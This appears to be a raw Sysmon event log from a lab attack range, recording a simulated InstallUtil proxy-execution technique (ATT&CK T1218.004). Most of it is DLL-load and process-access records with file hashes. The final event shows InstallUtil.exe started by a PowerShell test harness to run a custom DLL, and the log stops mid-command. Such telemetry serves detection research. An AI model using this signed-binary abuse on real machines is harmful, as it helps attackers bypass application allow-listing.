17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057599365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057599364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:28:57.922{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ea-0xc6418f3a) 734700x800000000000000057599362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057599361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057599360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057599359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057599358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057599357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057599356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057599355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057599354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057599353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057599352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057599351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057599350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057599349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057599348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057599347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057599346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057599345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057599344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057599343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057599342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057599341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057599340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057599339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-B9FC-04000000F101}48202424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 10341000x800000000000000057599338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-B9FC-04000000F101}48202424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62987(wow64) 10341000x800000000000000057599337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057599336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.906{8B6011A9-A459-618E-B9FC-04000000F101}48202424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 154100x800000000000000057599335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.909{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /U C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A459-618E-B9FC-04000000F101}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, 